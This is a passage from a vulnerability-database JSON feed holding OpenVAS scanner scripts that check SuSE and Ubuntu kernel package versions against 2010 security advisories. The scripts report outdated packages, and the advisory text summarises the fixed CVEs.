security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:49:01", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-12-13T00:00:00", "published": "2010-02-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850124", "id": "OPENVAS:850124", "title": "SuSE Update for kernel SUSE-SA:2010:010", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2010:010\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This update of the openSUSE 11.2 kernel brings the kernel to version\n 2.6.31.12 and contains a lot of bug and security fixes.\n\n CVE-2010-0299: The permission of the devtmpfs root directory\n was incorrectly 1777 (instead of 755). If it was used, local\n attackers could escalate privileges.\n (openSUSE 11.2 does not use this filesystem by default).\n\n CVE-2009-3939: The poll_mode_io file for the megaraid_sas driver in\n the Linux kernel 2.6.31.6 and earlier has world-writable permissions,\n which allows local users to change the I/O mode of the driver by\n modifying this file.\n\n CVE-2010-0007: ebtables was lacking a CAP_NET_ADMIN check, making\n it possible for local unprivileged attackers to modify the network\n bridge management.\n\n CVE-2010-0003: An information leakage on fatal signals on x86_64\n machines was fixed.\n\n CVE-2009-4141: A race condition in fasync handling could be used by\n local attackers to crash the machine or potentially execute code.\n\n CVE-2010-0006: The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in\n the Linux kernel before 2.6.32.4, when network namespaces are enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference) via an invalid IPv6 jumbogram.\n\n CVE-2009-4536: drivers/net/e1000/e1000_main.c in the e1000 driver in\n the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that\n exceed the MTU by processing certain trailing payload data as if it\n were a complete frame, which allows remote attackers to bypass packet\n filters via a large packet with a crafted payload.\n\n CVE-2009-4538: drivers/net/e1000e/netdev.c in the e1000e driver in\n the Linux kernel 2.6.32.3 and earlier does not properly check the\n size of an Ethernet frame that exceeds the MTU, which allows remote\n attackers to have an unspecified impact via crafted packets.\";\n\ntag_impact = \"remote denial of service\";\ntag_affected = \"kernel on openSUSE 11.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850124);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-010\");\n script_cve_id(\"CVE-2009-3939\", \"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0299\");\n script_name(\"SuSE Update for kernel SUSE-SA:2010:010\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:13", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "modified": "2018-01-18T00:00:00", "published": "2010-02-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840383", "id": "OPENVAS:1361412562310840383", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_894_1.nasl 8457 2018-01-18 07:58:32Z teissa $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-894-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\n filesystems did not correctly check certain disk structures. If a user\n were tricked into mounting a specially crafted filesystem, a remote\n attacker could crash the system or gain root privileges. (CVE-2009-4020,\n CVE-2009-4308)\n\n It was discovered that FUSE did not correctly check certain requests.\n A local attacker with access to FUSE mounts could exploit this to\n crash the system or possibly gain root privileges. Ubuntu 9.10 was not\n affected. (CVE-2009-4021)\n \n It was discovered that KVM did not correctly decode certain guest\n instructions. A local attacker in a guest could exploit this to\n trigger high scheduling latency in the host, leading to a denial of\n service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n \n It was discovered that the OHCI fireware driver did not correctly\n handle certain ioctls. A local attacker could exploit this to crash\n the system, or possibly gain root privileges. Ubuntu 6.06 was not\n affected. (CVE-2009-4138)\n \n Tavis Ormandy discovered that the kernel did not correctly handle\n O_ASYNC on locked files. A local attacker could exploit this to gain\n root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n \n Neil Horman and Eugene Teo discovered that the e1000 and e1000e\n network drivers did not correctly check the size of Ethernet frames.\n An attacker on the local network could send specially crafted traffic\n to bypass packet filters, crash the system, or possibly gain root\n privileges. (CVE-2009-4536, CVE-2009-4538)\n \n It was discovered that "print-fatal-signals" reporting could show\n arbitrary kernel memory contents. A local attacker could exploit\n this, leading to a loss of privacy. By default this is disabled in\n Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n \n Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\n handle jumbo frames. A remote attacker could exploit this to crash the\n system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were\n affected. (CVE-2010-0006)\n \n Florian Westphal discovered that bridging netfilter rules could be\n modified by unprivileged users. A local attacker could disrupt network\n traffic, leading to a denial of service. (CVE-2010-0007)\n \n Al Viro discovered that certain mremap operations could leak kernel\n memory. A local attacker could exploit this to consume all available\n memory, leading to a denial of service. (CVE-2010-0291)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-894-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840383\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-08 11:34:22 +0100 (Mon, 08 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"894-1\");\n script_cve_id(\"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4031\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0291\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-virtual\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-virtual\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.27\", ver:\"2.6.27-17.45\", 